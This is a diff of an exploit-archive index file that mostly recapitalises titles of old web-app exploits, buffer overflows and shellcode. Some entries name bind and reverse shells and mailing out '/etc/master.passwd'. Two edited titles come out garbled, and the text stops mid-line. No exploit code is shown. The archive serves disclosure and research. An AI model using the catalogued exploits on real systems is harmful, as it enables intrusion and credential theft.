11461,platforms/php/webapps/11461.txt,"CoffieNet CMS - Bypass Admin",2010-02-15,indoushka,php,webapps,0 11462,platforms/php/webapps/11462.txt,"blog ink - Bypass Setting",2010-02-15,indoushka,php,webapps,0 @@ -10598,7 +10598,7 @@ id,file,description,date,author,platform,type,port 11580,platforms/aix/webapps/11580.txt,"FileExecutive 1 - Multiple Vulnerabilities",2010-02-26,"ViRuSMaN ",aix,webapps,0 11581,platforms/windows/local/11581.py,"Orbital Viewer 1.04 - (.orb) Local Universal SEH Overflow",2010-02-26,mr_me,windows,local,0 11582,platforms/php/webapps/11582.txt,"DZ Erotik Auktionshaus 4.rgo - news.php SQL Injection",2010-02-27,"Easy Laster",php,webapps,0 -11583,platforms/php/webapps/11583.pl,"Gravity Board X 2.0 BETA (Public Release 3) - SQL Injection",2010-02-27,Ctacok,php,webapps,0 +11583,platforms/php/webapps/11583.pl,"Gravity Board X 2.0 Beta (Public Release 3) - SQL Injection",2010-02-27,Ctacok,php,webapps,0 11584,platforms/php/webapps/11584.txt,"Project Man 1.0 - (Authentication Bypass) SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 11585,platforms/php/webapps/11585.txt,"phpCDB 1.0 - Local File Inclusion",2010-02-27,"cr4wl3r ",php,webapps,0 11586,platforms/php/webapps/11586.txt,"phpRAINCHECK 1.0.1 - SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0 @@ -10720,7 +10720,7 @@ id,file,description,date,author,platform,type,port 11724,platforms/windows/dos/11724.pl,"GOM Player 2.1.21 - (.avi) Denial of Service",2010-03-14,En|gma7,windows,dos,0 11725,platforms/php/webapps/11725.txt,"Joomla Component com_org - SQL Injection",2010-03-14,N2n-Hacker,php,webapps,0 11726,platforms/php/webapps/11726.txt,"PHP-Fusion 6.01.15.4 - (downloads.php) SQL Injection",2010-03-14,Inj3ct0r,php,webapps,0 -14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 +14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 11727,platforms/php/webapps/11727.txt,"Front Door 0.4b - SQL Injection",2010-03-14,blake,php,webapps,0 11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - Denial of Service/Crash (.avi)",2010-03-14,En|gma7,windows,dos,0 11729,platforms/php/webapps/11729.txt,"DesktopOnNet 3 Beta9 - Local File Inclusion",2010-03-14,"cr4wl3r ",php,webapps,0 @@ -10771,7 +10771,7 @@ id,file,description,date,author,platform,type,port 11774,platforms/php/webapps/11774.txt,"Online Community CMS by I-net - SQL Injection",2010-03-16,"Th3 RDX",php,webapps,0 11775,platforms/php/webapps/11775.txt,"Short URL 1.01 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps,0 11776,platforms/php/webapps/11776.txt,"phpscripte24 Auktionshaus Community Standart System - Blind SQL Injection",2010-03-16,"Easy Laster",php,webapps,0 -11777,platforms/php/webapps/11777.txt,"egroupware 1.6.002 and egroupware premium line 9.1 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps,0 +11777,platforms/php/webapps/11777.txt,"eGroupWare 1.6.002 and eGroupWare premium line 9.1 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps,0 11778,platforms/php/webapps/11778.txt,"OSSIM 2.2 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps,0 11779,platforms/windows/local/11779.pl,"Windisc 1.3 - Stack Buffer Overflow Exploit",2010-03-16,Rick2600,windows,local,0 11780,platforms/php/webapps/11780.html,"Clain_TIger_CMS - Cross-Site Request Forgery",2010-03-17,"pratul agrawal",php,webapps,0 @@ -10850,7 +10850,7 @@ id,file,description,date,author,platform,type,port 11866,platforms/php/webapps/11866.txt,"New CMS - Local File Inclusion",2010-03-24,Xash,php,webapps,0 11867,platforms/php/webapps/11867.txt,"Joomla Component com_wallpapers - SQL Injection",2010-03-24,"DevilZ TM",php,webapps,0 11868,platforms/php/webapps/11868.txt,"Joomla Component com_software - SQL Injection",2010-03-24,"DevilZ TM",php,webapps,0 -11871,platforms/php/webapps/11871.txt,"Vbulletin Blog 4.0.2 - Title Cross-Site Scripting",2010-03-24,FormatXformat,php,webapps,0 +11871,platforms/php/webapps/11871.txt,"vBulletin Blog 4.0.2 - Title Cross-Site Scripting",2010-03-24,FormatXformat,php,webapps,0 11872,platforms/windows/local/11872.py,"KenWard's Zipper 1.400 - Buffer Overflow Method 2",2010-03-25,sinn3r,windows,local,0 11873,platforms/php/webapps/11873.txt,"Interactivefx.ie CMS - SQL Injection",2010-03-25,Inj3ct0r,php,webapps,0 11874,platforms/php/webapps/11874.txt,"INVOhost - SQL Injection",2010-03-25,"Andrés Gómez",php,webapps,0 @@ -10860,9 +10860,9 @@ id,file,description,date,author,platform,type,port 11878,platforms/windows/dos/11878.py,"Cisco TFTP Server 1.1 - Denial of Service",2010-03-25,_SuBz3r0_,windows,dos,69 11879,platforms/windows/remote/11879.txt,"SAP GUI 7.00 - BExGlobal Active-X unsecure method",2010-03-25,"Alexey Sintsov",windows,remote,0 11880,platforms/hardware/dos/11880.txt,"Lexmark Multiple Laser printers - Remote Stack Overflow",2010-03-25,"Francis Provencher",hardware,dos,0 -11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 beta - (/photo.php) SQL Injection",2010-03-25,Sc0rpi0n,php,webapps,0 +11881,platforms/php/webapps/11881.php,"SiteX CMS 0.7.4 Beta - (/photo.php) SQL Injection",2010-03-25,Sc0rpi0n,php,webapps,0 11882,platforms/php/webapps/11882.txt,"Direct News 4.10.2 - Multiple Remote File Inclusion",2010-03-25,mat,php,webapps,0 -11883,platforms/php/webapps/11883.txt,"WebSiteBaker 2.8.1 - DataBase Backup Disclosure",2010-03-25,Tr0y-x,php,webapps,0 +11883,platforms/php/webapps/11883.txt,"WebsiteBaker 2.8.1 - DataBase Backup Disclosure",2010-03-25,Tr0y-x,php,webapps,0 11884,platforms/php/webapps/11884.txt,"Joomla Component dcsFlashGames 2.0RC1 - SQL Injection (catid)",2010-03-26,kaMtiEz,php,webapps,0 11885,platforms/php/webapps/11885.txt,"Flirt Matching Sms System - SQL Injection",2010-03-26,"Easy Laster",php,webapps,0 11886,platforms/windows/remote/11886.py,"SAP MaxDB - Malformed Handshake Request Remote Code Execution",2010-03-26,"S2 Crew",windows,remote,0 @@ -10881,7 +10881,7 @@ id,file,description,date,author,platform,type,port 11900,platforms/windows/local/11900.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - (.pls) Universal Stack Buffer Overflow",2010-03-27,mat,windows,local,0 11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multi Local File Inclusion",2010-03-27,ITSecTeam,php,webapps,0 11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - multi file include",2010-03-27,ITSecTeam,php,webapps,0 -11904,platforms/php/webapps/11904.txt,"68kb - Multi Remote File Inclusion",2010-03-27,ITSecTeam,php,webapps,0 +11904,platforms/php/webapps/11904.txt,"68KB - Multi Remote File Inclusion",2010-03-27,ITSecTeam,php,webapps,0 11905,platforms/php/webapps/11905.txt,"Simple Machines Forum (SMF) 1.1.8 - (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0 11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail 2.7.2 - Multiple Vulnerabilities",2010-03-27,"cp77fk4r ",php,webapps,0 11908,platforms/php/webapps/11908.txt,"Joomla Component com_solution - SQL Injection",2010-03-27,"DevilZ TM",php,webapps,0 @@ -10898,7 +10898,7 @@ id,file,description,date,author,platform,type,port 11922,platforms/php/webapps/11922.txt,"Devana - SQL Injection",2010-03-28,Valentin,php,webapps,0 11923,platforms/php/webapps/11923.txt,"TSOKA:CMS 1.1 & 1.9 & 2.0 - SQL Injection / Cross-Site Scripting",2010-03-28,d3v1l,php,webapps,0 11924,platforms/php/webapps/11924.txt,"Joomla Component com_units - SQL Injection",2010-03-28,"DevilZ TM",php,webapps,0 -11925,platforms/php/webapps/11925.txt,"68kb Knowledge Base Script 1.0.0rc2 - Search SQL Injection",2010-03-28,"Jelmer de Hen",php,webapps,0 +11925,platforms/php/webapps/11925.txt,"68KB Knowledge Base Script 1.0.0rc2 - Search SQL Injection",2010-03-28,"Jelmer de Hen",php,webapps,0 11927,platforms/php/webapps/11927.txt,"Joomla Component com_departments - SQL Injection",2010-03-29,"DevilZ TM",php,webapps,0 11928,platforms/php/webapps/11928.txt,"Joomla Component com_business - SQL Injection",2010-03-29,"DevilZ TM",php,webapps,0 11929,platforms/php/webapps/11929.txt,"Joomla Component com_radio - SQL Injection",2010-03-29,"DevilZ TM",php,webapps,0 @@ -10960,7 +10960,7 @@ id,file,description,date,author,platform,type,port 11999,platforms/php/webapps/11999.txt,"Joomla Component webERPcustomer - Local File Inclusion",2010-04-01,"Chip d3 bi0s",php,webapps,0 12000,platforms/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - (.mdb) Crash PoC",2010-04-01,anonymous,windows,dos,0 12001,platforms/windows/dos/12001.pl,"Kwik Pay Payroll 4.10.3 - '.zip' Denial of Service",2010-04-01,anonymous,windows,dos,0 -12002,platforms/php/webapps/12002.txt,"Musicbox 3.3 - Arbitrary File Upload",2010-04-01,indoushka,php,webapps,0 +12002,platforms/php/webapps/12002.txt,"MusicBox 3.3 - Arbitrary File Upload",2010-04-01,indoushka,php,webapps,0 12003,platforms/php/webapps/12003.txt,"onepound Shop / CMS - Cross-Site Scripting / SQL Injection",2010-04-01,Valentin,php,webapps,0 12004,platforms/php/webapps/12004.txt,"PHP Jokesite 2.0 - exec Command Exploit",2010-04-01,indoushka,php,webapps,0 12005,platforms/php/webapps/12005.txt,"Profi Einzelgebots Auktions System - Blind SQL Injection",2010-04-01,"Easy Laster",php,webapps,0 @@ -10976,8 +10976,8 @@ id,file,description,date,author,platform,type,port 12017,platforms/php/webapps/12017.txt,"Joomla Component com_football - SQL Injection",2010-04-02,"DevilZ TM",php,webapps,0 12018,platforms/php/webapps/12018.txt,"DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities",2010-04-02,eidelweiss,php,webapps,0 12019,platforms/php/webapps/12019.txt,"Velhost Uploader Script 1.2 - Local File Inclusion",2010-04-02,"cr4wl3r ",php,webapps,0 -12021,platforms/php/webapps/12021.txt,"68kb Knowledge Base 1.0.0rc3 - Admin Cross-Site Request Forgery",2010-04-02,"Jelmer de Hen",php,webapps,0 -12022,platforms/php/webapps/12022.txt,"68kb Knowledge Base 1.0.0rc3 - Edit Main Settings Cross-Site Request Forgery",2010-04-02,"Jelmer de Hen",php,webapps,0 +12021,platforms/php/webapps/12021.txt,"68kb 68KB Base 1.0.0rc3 - Admin Cross-Site Request Forgery",2010-04-02,"Jelmer de Hen",php,webapps,0 +12022,platforms/php/webapps/12022.txt,"68KB Knowledge Base 1.0.0rc3 - Edit Main Settings Cross-Site Request Forgery",2010-04-02,"Jelmer de Hen",php,webapps,0 12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - '.zip' Stack Buffer Overflow Exploit (PoC)",2010-04-03,mr_me,windows,local,0 12025,platforms/windows/dos/12025.php,"Dualis 20.4 - (.bin) Local Daniel Of Service",2010-04-03,"Yakir Wizman",windows,dos,0 12026,platforms/php/webapps/12026.txt,"phpscripte24 Vor und Rückwärts Auktions System - Blind SQL Injection",2010-04-03,"Easy Laster",php,webapps,0 @@ -11048,7 +11048,7 @@ id,file,description,date,author,platform,type,port 12095,platforms/linux/dos/12095.txt,"Virata EmWeb R6.0.1 - Remote Crash",2010-04-06,"Jobert Abma",linux,dos,0 12096,platforms/windows/dos/12096.txt,"Juke 4.0.2 - Denial of Service Multiple Files",2010-04-06,anonymous,windows,dos,0 12097,platforms/php/webapps/12097.txt,"Joomla Component XOBBIX - prodid SQL Injection",2010-04-06,AntiSecurity,php,webapps,0 -12098,platforms/php/webapps/12098.txt,"WordPress Plugin NextGEN Gallery 1.5.1 - Cross-Site Scripting",2010-04-06,"Alejandro Rodriguez",php,webapps,0 +12098,platforms/php/webapps/12098.txt,"Wordpress Plugin NextGEN Gallery 1.5.1 - Cross-Site Scripting",2010-04-06,"Alejandro Rodriguez",php,webapps,0 12100,platforms/asp/webapps/12100.txt,"Espinas CMS - SQL Injection",2010-04-07,"Pouya Daneshmand",asp,webapps,0 12101,platforms/php/webapps/12101.txt,"Joomla Component aWiki com_awiki - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 12102,platforms/php/webapps/12102.txt,"Joomla Component VJDEO com_vjdeo 1.0 - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 @@ -11108,7 +11108,7 @@ id,file,description,date,author,platform,type,port 12161,platforms/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Unspecified Memory Corruption PoC",2010-04-11,LiquidWorm,windows,dos,0 12162,platforms/php/webapps/12162.txt,"Joomla component mv_restaurantmenumanager - SQL Injection",2010-04-11,Sudden_death,php,webapps,0 12163,platforms/php/webapps/12163.txt,"Worldviewer.com CMS - SQL Injection",2010-04-12,"41.w4r10r aka AN1L",php,webapps,0 -12164,platforms/php/webapps/12164.txt,"YaPig 0.94.0u - Remote File Inclusion",2010-04-12,JIKO,php,webapps,0 +12164,platforms/php/webapps/12164.txt,"YaPiG 0.94.0u - Remote File Inclusion",2010-04-12,JIKO,php,webapps,0 12165,platforms/multiple/dos/12165.txt,"PHP 5.3.0 - getopt() Denial of Service",2010-04-12,Napst3r,multiple,dos,0 12166,platforms/php/webapps/12166.txt,"Joomla Component Web TV com_webtv - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12167,platforms/php/webapps/12167.txt,"Joomla Component Horoscope com_horoscope - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 @@ -11130,7 +11130,7 @@ id,file,description,date,author,platform,type,port 12183,platforms/php/webapps/12183.txt,"Joomla Component com_jdrugstopics - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0 12184,platforms/php/webapps/12184.txt,"Joomla Component com_sermonspeaker - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0 12185,platforms/php/webapps/12185.txt,"Joomla Component com_flexicontent - Local File",2010-04-12,eidelweiss,php,webapps,0 -12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 beta - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-04-12,"cr4wl3r ",php,webapps,0 +12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-04-12,"cr4wl3r ",php,webapps,0 12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - Format String",2010-04-12,"Alexey Sintsov",multiple,dos,0 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 12190,platforms/php/webapps/12190.txt,"Joomla Component Jvehicles - (aid) SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0 @@ -11293,9 +11293,9 @@ id,file,description,date,author,platform,type,port 12370,platforms/php/webapps/12370.txt,"NCT Jobs Portal Script - Cross-Site Scripting / Authentication Bypass",2010-04-24,Sid3^effects,php,webapps,0 12371,platforms/php/webapps/12371.txt,"WHMCS control (WHMCompleteSolution) - SQL Injection",2010-04-24,"Islam DefenDers",php,webapps,0 12372,platforms/php/webapps/12372.txt,"AskMe Pro 2.1 - (que_id) SQL Injection",2010-04-24,v3n0m,php,webapps,0 -12373,platforms/php/webapps/12373.txt,"Sethi Family Guestbook 3.1.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 -12374,platforms/php/webapps/12374.txt,"G5 Scripts Guestbook PHP 1.2.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 -12375,platforms/osx/dos/12375.c,"MacOS X 10.6 - HFS File System Attack (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0 +12373,platforms/php/webapps/12373.txt,"Sethi Family GuestBook 3.1.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 +12374,platforms/php/webapps/12374.txt,"G5 Scripts GuestBook PHP 1.2.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 +12375,platforms/osx/dos/12375.c,"Mac OSX 10.6 - HFS File System Attack (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0 12376,platforms/php/webapps/12376.php,"SmodCMS 4.07 (fckeditor) - Arbitrary File Upload Exploit",2010-04-24,eidelweiss,php,webapps,0 12378,platforms/php/webapps/12378.txt,"CMS Firebrand Tec - Local File Inclusion",2010-04-25,R3VAN_BASTARD,php,webapps,0 12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - '.zip' Stack Buffer Overflow Exploit (PoC)",2010-04-25,mr_me,windows,local,0 @@ -11366,7 +11366,7 @@ id,file,description,date,author,platform,type,port 12454,platforms/php/webapps/12454.txt,"Zyke CMS 1.0 - Remote File Upload",2010-04-29,indoushka,php,webapps,0 12455,platforms/php/webapps/12455.txt,"Ucenter Projekt 2.0 - Insecure crossdomain (Cross-Site Scripting)",2010-04-29,indoushka,php,webapps,0 12456,platforms/php/webapps/12456.txt,"chCounter - indirect SQL Injection / Cross-Site Scripting",2010-04-29,Valentin,php,webapps,0 -12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 - (Win32) CSS Remote Denial of Service",2010-04-29,ITSecTeam,windows,dos,0 +12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Windows/x86) - (Windows/x86) CSS Remote Denial of Service",2010-04-29,ITSecTeam,windows,dos,0 12458,platforms/php/webapps/12458.txt,"Scratcher - (SQL Injection / Cross-Site Scripting) Multiple Remote",2010-04-29,"cr4wl3r ",php,webapps,0 12459,platforms/php/webapps/12459.txt,"ec21 clone 3.0 - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0 12460,platforms/php/webapps/12460.txt,"b2b gold script - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0 @@ -11477,7 +11477,7 @@ id,file,description,date,author,platform,type,port 12577,platforms/php/webapps/12577.txt,"Marinet CMS - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-11,CoBRa_21,php,webapps,0 12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 - (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0 12579,platforms/php/webapps/12579.txt,"Joomla Custom PHP Pages Component com_php - Local File Inclusion",2010-05-12,"Chip d3 bi0s",php,webapps,0 -12580,platforms/windows/remote/12580.txt,"miniwebsvr 0.0.10 - Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0 +12580,platforms/windows/remote/12580.txt,"MiniWebsvr 0.0.10 - Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0 12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0 12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0 12583,platforms/php/webapps/12583.txt,"e-webtech - (fixed_page.asp) SQL Injection",2010-05-12,FL0RiX,php,webapps,0 @@ -11623,7 +11623,7 @@ id,file,description,date,author,platform,type,port 12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection",2010-05-24,ByEge,php,webapps,0 12732,platforms/php/webapps/12732.php,"JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities",2010-05-24,eidelweiss,php,webapps,0 12734,platforms/asp/webapps/12734.txt,"Blaze Apps - Multiple Vulnerabilities",2010-05-24,"AmnPardaz ",asp,webapps,0 -12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery - SQL Injection",2010-05-25,cyberlog,php,webapps,0 +12735,platforms/php/webapps/12735.txt,"Nitro Web Gallery - SQL Injection",2010-05-25,cyberlog,php,webapps,0 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks Inc - 'news.php' SQL Injection",2010-05-25,"Dr.SiLnT HilL",php,webapps,0 12737,platforms/php/webapps/12737.txt,"Simpel Side - (index2.php) SQL Injection",2010-05-25,MN9,php,webapps,0 12740,platforms/windows/dos/12740.py,"Webby Webserver - PoC SEH control",2010-05-25,m-1-k-3,windows,dos,0 @@ -11672,7 +11672,7 @@ id,file,description,date,author,platform,type,port 12796,platforms/php/webapps/12796.txt,"Joomla Component BF Quiz - SQL Injection (2)",2010-05-29,"Valentin Hoebel",php,webapps,0 12797,platforms/php/webapps/12797.txt,"Webiz 2004 - Local File Upload",2010-05-29,kannibal615,php,webapps,0 12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps,0 -12801,platforms/php/webapps/12801.txt,"Oscommerce Online Merchant 2.2 - File Disclosure / Authentication Bypass",2010-05-30,Flyff666,php,webapps,0 +12801,platforms/php/webapps/12801.txt,"osCommerce Online Merchant 2.2 - File Disclosure / Authentication Bypass",2010-05-30,Flyff666,php,webapps,0 12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function Initialize() Buffer Overflow",2010-05-30,sinn3r,windows,local,0 12804,platforms/multiple/remote/12804.txt,"nginx http server 0.6.36 - Path Draversal",2010-05-30,"cp77fk4r ",multiple,remote,0 12805,platforms/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0 @@ -11680,7 +11680,7 @@ id,file,description,date,author,platform,type,port 12807,platforms/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0 12808,platforms/php/webapps/12808.txt,"PTC Site's - Remote Code Execution / Cross-Site Scripting",2010-05-30,CrazyMember,php,webapps,0 12809,platforms/php/webapps/12809.txt,"Symphony CMS - Local File Inclusion",2010-05-30,AntiSecurity,php,webapps,0 -12811,platforms/php/webapps/12811.txt,"Oscommerce Online Merchant 2.2 - Remote File Upload",2010-05-30,MasterGipy,php,webapps,0 +12811,platforms/php/webapps/12811.txt,"osCommerce Online Merchant 2.2 - Remote File Upload",2010-05-30,MasterGipy,php,webapps,0 12812,platforms/php/webapps/12812.txt,"Joomla com_quran - SQL Injection",2010-05-30,r3m1ck,php,webapps,0 12813,platforms/php/webapps/12813.txt,"WsCMS - Multiple SQL Injections",2010-05-31,cyberlog,php,webapps,0 12814,platforms/php/webapps/12814.txt,"Joomla Component com_g2bridge - Local File Inclusion",2010-05-31,akatsuchi,php,webapps,0 @@ -11692,7 +11692,7 @@ id,file,description,date,author,platform,type,port 12820,platforms/php/webapps/12820.txt,"Visitor Logger - (banned.php) Remote File Inclusion",2010-05-31,bd0rk,php,webapps,0 12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - SEH Exploit",2010-05-31,Stoke,windows,local,0 12822,platforms/php/webapps/12822.txt,"Joomla Component com_jsjobs - SQL Injection",2010-05-31,d0lc3,php,webapps,0 -12823,platforms/php/webapps/12823.txt,"musicbox - SQL Injection",2010-05-31,titanichacker,php,webapps,0 +12823,platforms/php/webapps/12823.txt,"MusicBox - SQL Injection",2010-05-31,titanichacker,php,webapps,0 12833,platforms/asp/webapps/12833.txt,"Patient folder (THEME ASP) - SQL Injection",2010-05-31,"SA H4x0r",asp,webapps,0 12834,platforms/windows/remote/12834.py,"XFTP 3.0 Build 0239 - Long filename Buffer Overflow",2010-06-01,sinn3r,windows,remote,0 12839,platforms/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,php,webapps,0 @@ -11716,23 +11716,23 @@ id,file,description,date,author,platform,type,port 12866,platforms/php/webapps/12866.txt,"K9 Kreativity Design - (pages.php) SQL Injection",2010-06-03,Newbie_Campuz,php,webapps,0 12867,platforms/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,php,webapps,0 12868,platforms/php/webapps/12868.txt,"Joomla Component com_lead - SQL Injection",2010-06-03,ByEge,php,webapps,0 -13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 +13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 -13243,platforms/bsd_ppc/shellcode/13243.c,"BSD/PPC - execve /bin/sh shellcode (128 bytes)",2004-09-26,Palante,bsd_ppc,shellcode,0 -13244,platforms/bsd_x86/shellcode/13244.c,"BSD/x86 - setuid(0) then execve /bin/sh shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0 -13245,platforms/bsd_x86/shellcode/13245.c,"BSD/x86 - setuid/portbind 31337/TCP shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0 -13246,platforms/bsd_x86/shellcode/13246.c,"BSD/x86 - execve /bin/sh multiplatform shellcode (27 bytes)",2004-09-26,n0gada,bsd_x86,shellcode,0 -13247,platforms/bsd_x86/shellcode/13247.c,"BSD/x86 - execve /bin/sh setuid (0) shellcode (29 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 -13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - portbind port 31337 shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0 -13249,platforms/bsd_x86/shellcode/13249.c,"BSD/x86 - portbind port random shellcode (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode,0 -13250,platforms/bsd_x86/shellcode/13250.c,"BSD/x86 - break chroot shellcode (45 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 -13251,platforms/bsd_x86/shellcode/13251.c,"BSD/x86 - execve /bin/sh Crypt /bin/sh shellcode (49 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0 -13252,platforms/bsd_x86/shellcode/13252.c,"BSD/x86 - execve /bin/sh ENCRYPT* shellcode (57 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 -13254,platforms/bsd_x86/shellcode/13254.c,"BSD/x86 - connect torootteam.host.sk:2222 shellcode (93 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0 -13255,platforms/bsd_x86/shellcode/13255.c,"BSD/x86 - cat /etc/master.passwd | mail [email] shellcode (92 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 -13256,platforms/bsd_x86/shellcode/13256.c,"BSD/x86 - reverse 6969 portbind shellcode (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0 -13257,platforms/bsdi_x86/shellcode/13257.txt,"BSDi/x86 - execve /bin/sh shellcode (45 bytes)",2004-09-26,duke,bsdi_x86,shellcode,0 -13258,platforms/bsdi_x86/shellcode/13258.txt,"BSDi/x86 - execve /bin/sh shellcode (46 bytes)",2004-09-26,vade79,bsdi_x86,shellcode,0 +13243,platforms/bsd_ppc/shellcode/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,bsd_ppc,shellcode,0 +13244,platforms/bsd_x86/shellcode/13244.c,"BSD/x86 - setuid(0) then execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0 +13245,platforms/bsd_x86/shellcode/13245.c,"BSD/x86 - setuid/portbind 31337/TCP Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0 +13246,platforms/bsd_x86/shellcode/13246.c,"BSD/x86 - execve /bin/sh multiplatform Shellcode (27 bytes)",2004-09-26,n0gada,bsd_x86,shellcode,0 +13247,platforms/bsd_x86/shellcode/13247.c,"BSD/x86 - execve /bin/sh setuid (0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 +13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - portbind port 31337 Shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0 +13249,platforms/bsd_x86/shellcode/13249.c,"BSD/x86 - portbind port random Shellcode (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode,0 +13250,platforms/bsd_x86/shellcode/13250.c,"BSD/x86 - break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 +13251,platforms/bsd_x86/shellcode/13251.c,"BSD/x86 - execve /bin/sh Crypt /bin/sh Shellcode (49 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0 +13252,platforms/bsd_x86/shellcode/13252.c,"BSD/x86 - execve /bin/sh ENCRYPT* Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 +13254,platforms/bsd_x86/shellcode/13254.c,"BSD/x86 - connect torootteam.host.sk:2222 Shellcode (93 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0 +13255,platforms/bsd_x86/shellcode/13255.c,"BSD/x86 - cat /etc/master.passwd | mail [email] Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 +13256,platforms/bsd_x86/shellcode/13256.c,"BSD/x86 - reverse 6969 portbind Shellcode (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0 +13257,platforms/bsdi_x86/shellcode/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 